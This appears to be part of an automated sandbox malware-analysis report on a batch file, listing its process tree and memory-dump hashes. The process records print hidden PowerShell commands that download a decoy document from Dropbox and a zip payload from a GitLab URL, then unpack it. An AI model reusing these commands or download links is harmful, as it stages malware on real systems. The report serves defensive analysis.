                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:findstr /L /I pause "C:\Users\user\Desktop\bose1511mkt.bat"
                                                                                                                                                                                                                      Imagebase:0x7ff694e50000
                                                                                                                                                                                                                      File size:36'352 bytes
                                                                                                                                                                                                                      MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                      Imagebase:0x7ff690590000
                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:10
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:fINd
                                                                                                                                                                                                                      Imagebase:0x7ff601620000
                                                                                                                                                                                                                      File size:17'920 bytes
                                                                                                                                                                                                                      MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                      Imagebase:0x7ff690590000
                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                      Start time:02:35:06
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/e2xjf5lc4ozmjfx1xvbkr/16_Advertising_Campaign_and_Collaboration.docx?rlkey=gqzq7m8iwlwtriryr5u9inan8&st=5dnoyqbj&dl=1', 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx')"
                                                                                                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                      Start time:02:35:15
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\16_Advertising_Campaign_and_Collaboration.docx'"
                                                                                                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                      Start time:02:35:16
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/16Fukrun.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:19
                                                                                                                                                                                                                      Start time:02:35:37
                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                                                      Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Reset < >
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2251551211.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ffd34610000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: f50d2334d858e61cbb19a77cdcde0733c30faa89257915d6a80ffb0d799e1e55
                                                                                                                                                                                                                        • Instruction ID: 54809d067ef27ef20c93e43bb7d3208dac50fc76184c01ccbf42871cfb3474c5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f50d2334d858e61cbb19a77cdcde0733c30faa89257915d6a80ffb0d799e1e55
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7B11722B0EBC60FEB9A9A2858B55F57BD1EF47210B0801FFE189C75E3D91DA802D341
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2251551211.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ffd34610000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 9a3bc1da81717b713f0eec4e817354b2ebe3cca81bbe166da61f0eac341d0a2e
                                                                                                                                                                                                                        • Instruction ID: adeb418b1d01e0a4a87f10e244252b287c819b07504707cdeff165e618917d49
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3bc1da81717b713f0eec4e817354b2ebe3cca81bbe166da61f0eac341d0a2e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E31F422F1EE960FEBA99A1D14F51F862C2EF42214B98017ED21EC39D3DD1EA801E241
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2251551211.00007FFD34610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34610000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ffd34610000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 0c096e6f94dffab6e44343834ba426e1a1048bf956117b28a29e5dfffcd7e463
                                                                                                                                                                                                                        • Instruction ID: 2f815cc63261c99801ea3c51c004cbe67f0d1200e8230b221fc41733a411b967
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c096e6f94dffab6e44343834ba426e1a1048bf956117b28a29e5dfffcd7e463
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E311E371F0D7884FEB61DF9884A41A87BE1EF4A310B0400BEC90EDB193CA29A845D351
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2251082634.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                        • Instruction ID: dd8886707b4c866e5de797d7786290134f04cf873e79f1c0caf44042c4925d0a
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 348d5fb5261f51f812e1f49a056d31a35d386422633fb1efa08e0a84813b5c5b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9901A73020CB0C4FD744EF0CE051AA5B7E0FB95324F10052DE58AC3655D736E881CB41
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2251082634.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 3d9da65f40f6c83c0f0a60fc086a9db52ea8094f275e4f6fc34c86379e289e79
                                                                                                                                                                                                                        • Instruction ID: a70307f1ce09c5ab9e9fd47f6fad609ad6c1ce062a8e136994196d82ea807516
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d9da65f40f6c83c0f0a60fc086a9db52ea8094f275e4f6fc34c86379e289e79
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29B19353F0E6925BE757976CA8F52E63F90EF6326470901B7C2C8CE1A3DD1CA8069391
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2251082634.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: a846cee5bb119006a71d8e9893608cb27fec8e0f6a691d94e9a6e16e00a7b1d5
                                                                                                                                                                                                                        • Instruction ID: 2545a77b2e83b42ba6c75d2050a78be140d1dc4bdb599c1704f5d34e7028b1a8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a846cee5bb119006a71d8e9893608cb27fec8e0f6a691d94e9a6e16e00a7b1d5
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43917247F0F6D25BEB63566858F52E52FA09F53325B0900B3D6D8CE1E39D0D7806A262
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2473678727.00007FFD34600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34600000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffd34600000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 47a5fc0deed2aefff3cdd545cb89e2d0212eac6cfc73265a15f7aa61f96eed3c
                                                                                                                                                                                                                        • Instruction ID: 7fff3d4b027c83d39bf2bcbdcaf225b1dcfbe427fbc9274e4bb41f4e2e47b35b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47a5fc0deed2aefff3cdd545cb89e2d0212eac6cfc73265a15f7aa61f96eed3c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1051E722B1DE560FEBA99B6C74B12F973C2EF47314B58057ED25EC31D3DE1AA8019281
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2473678727.00007FFD34600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34600000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffd34600000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 40276c9c39937f0f6ea5ab2767b95a2c8906be51857d082ee197329fdeb18fe7
                                                                                                                                                                                                                        • Instruction ID: 678a1f85493f56e814b689174c6020a4b92ca628a38f7a4de33219dcf3fa2d3d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40276c9c39937f0f6ea5ab2767b95a2c8906be51857d082ee197329fdeb18fe7
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1E31C622F1EE570BF7A99B5C24F52F862C2EF43255B98017ED25EC31D3DE1EA801A241
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000E.00000002.2472719681.00007FFD34530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34530000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffd34530000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                                                                                                                                                                                        • Instruction ID: 2f5350af58d0a43e2e79c0f811cb6a93ca8431c1c646b3d3f35f7a9d1fd6ca7f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3018d185270f09d679e4fb71a88b6ef8450c789612176cac0f9877b3821b575
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2101677121CB0C4FD744EF4CE451AA5B7E0FB95364F10056DE58AC3655D736E881CB45
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: bS_L
                                                                                                                                                                                                                        • API String ID: 0-2631416925
                                                                                                                                                                                                                        • Opcode ID: c5aada9c28723a81c54bb1ff0b4ad9acd0ea0b2eb62c6bbcb76533b8516c947c
                                                                                                                                                                                                                        • Instruction ID: 15cc419afdb9dab7a72ee83a6751a938f39bf240c81bb567dde0856a1c9503ed
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c5aada9c28723a81c54bb1ff0b4ad9acd0ea0b2eb62c6bbcb76533b8516c947c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4222D34A0894D8FDF98EF1CC894AA977E1FF69301F0501A9E55EDB2A5DA39EC41CB40
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                                                                        • Opcode ID: a51976b4e836b804e2ee659b420af5c517482c86328570828d1ac316bce921ed
                                                                                                                                                                                                                        • Instruction ID: 6eb10ed4cc0cfcdb1a2c51e3efd90ef7f4ac6e28aef873ecca797282171510b4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a51976b4e836b804e2ee659b420af5c517482c86328570828d1ac316bce921ed
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F3913B31B0CA5D0FE7A5EB2C98656B57BD1EF96310F1401BBE58DC72A6CD189C428381
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: HSx4
                                                                                                                                                                                                                        • API String ID: 0-3612096620
                                                                                                                                                                                                                        • Opcode ID: 9232e16910333514f5fbcbaeb62be6207f7b100e1ae7d53cdd7185c0f6a4be53
                                                                                                                                                                                                                        • Instruction ID: 16facbcbaf641d3492f60b806b2d746ba1032ca9cf4baa8aa2f0e8d6963821d3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9232e16910333514f5fbcbaeb62be6207f7b100e1ae7d53cdd7185c0f6a4be53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D51D831B0D9184FEB95EB18D8A57B977E1EF9A301F1000BAD54ED7297DE28AC068781
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: fT4
                                                                                                                                                                                                                        • API String ID: 0-844082005
                                                                                                                                                                                                                        • Opcode ID: ab8d0bf35e728b9aef44119589faf341f2768ba531bcc74aa21067c30bc1d799
                                                                                                                                                                                                                        • Instruction ID: 21b72e0f13e7848370a20c67a214ba23a73f8b535452282aa10877b5942c13de
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab8d0bf35e728b9aef44119589faf341f2768ba531bcc74aa21067c30bc1d799
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4431F621F0DA890FE796A62C58B61B57BD1EF56214B0905FFC54ECB3A3DD1DA8068342
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: 4x4
                                                                                                                                                                                                                        • API String ID: 0-1682324005
                                                                                                                                                                                                                        • Opcode ID: 804aeed2258d64c85e43cca8823e9995036db754708f0ad03ae2b28a007ab7c4
                                                                                                                                                                                                                        • Instruction ID: 05d0e28e89d0857b1e059bf9b9e8190eab4560644d63a6e2b9aba2d5c87356b3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 804aeed2258d64c85e43cca8823e9995036db754708f0ad03ae2b28a007ab7c4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E01B572F0CA180BD75D994C78522B873D1E79A721F00023FE58FC3382DE2AAC035286
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: 4x4
                                                                                                                                                                                                                        • API String ID: 0-1682324005
                                                                                                                                                                                                                        • Opcode ID: 56390ac709342ac00b5943aee4e232372ece4a7c11b01e73f9ce9bdf7c4b0bb2
                                                                                                                                                                                                                        • Instruction ID: 852f3a19104c12a87df24e8b01d5282fe2515b3e57d29fcf807437a7cd35d8d4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56390ac709342ac00b5943aee4e232372ece4a7c11b01e73f9ce9bdf7c4b0bb2
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5301B172F0CA180BD75D994C78972BC73D1E79A621F00023FE18FC3392DE2AA8135286
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: 4x4
                                                                                                                                                                                                                        • API String ID: 0-1682324005
                                                                                                                                                                                                                        • Opcode ID: 1fe75e6918efc1b1e63e154b1a69f980ab8b552369f3d4906aea245b0a755a98
                                                                                                                                                                                                                        • Instruction ID: f2146dd623b117b276479a303675ab5023af0c3c9bc6b486be0b4f40f79eb743
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fe75e6918efc1b1e63e154b1a69f980ab8b552369f3d4906aea245b0a755a98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 96017172F0CA180BD75D994D68922B873D1E799625B00023FE68ED3392DE26A8135286
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 09047bd652921b5e2b4fc77d7a181c6995ed2c9c87e3f6198af0bd247ecd4a3d
                                                                                                                                                                                                                        • Instruction ID: 7bf27447a4a9340fbb765b5be72430102841a519db0691be6cbad614c5025c87
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09047bd652921b5e2b4fc77d7a181c6995ed2c9c87e3f6198af0bd247ecd4a3d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A218D52A0EAC21FE757A77858B50A57FA0AF13210B0D04FBD5D8CF1E3E949A848D363
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 2028e5f0d5dc40157ff8d703bdd491b86ca983c15daf7bd997bd294999c2792b
                                                                                                                                                                                                                        • Instruction ID: 31c184ac2fe45896148d20538deac312a410d3a835e096046353d3e93eb8b19e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2028e5f0d5dc40157ff8d703bdd491b86ca983c15daf7bd997bd294999c2792b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3FB1F721F1D94E4FFBAAAB6844B53B966D1EF8A351F4400BAD64ECB3C3DD1CA8025341
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: b8a8c11080264be7d61a77bdcb0ac69e420409adf0128565d31663f1095ffbf0
                                                                                                                                                                                                                        • Instruction ID: cf2ee36b5a0c2fa904f3d6ba0b8558423fd5b0400884a4d168f039d5abcd4634
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b8a8c11080264be7d61a77bdcb0ac69e420409adf0128565d31663f1095ffbf0
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4071C421F18D1A0FEAA5F76C80B62BDA3D2EF9A751B404175D14ED73D6DE2CAC429380
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_7ffd34540000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: bd9310082e6bdc9c477daccb85487cbf9e1de37f2819ffbefc6479993e3276fc
                                                                                                                                                                                                                        • Instruction ID: 980fa61836482db574d6005263cfdd7549843112ab58a9770df2b2c863df6d1c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd9310082e6bdc9c477daccb85487cbf9e1de37f2819ffbefc6479993e3276fc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6151C830B0DA494FD7A5DF6CD4A46697BE0FF5931174500BAE589CB362DE28EC41C781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000013.00000002.3443368847.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
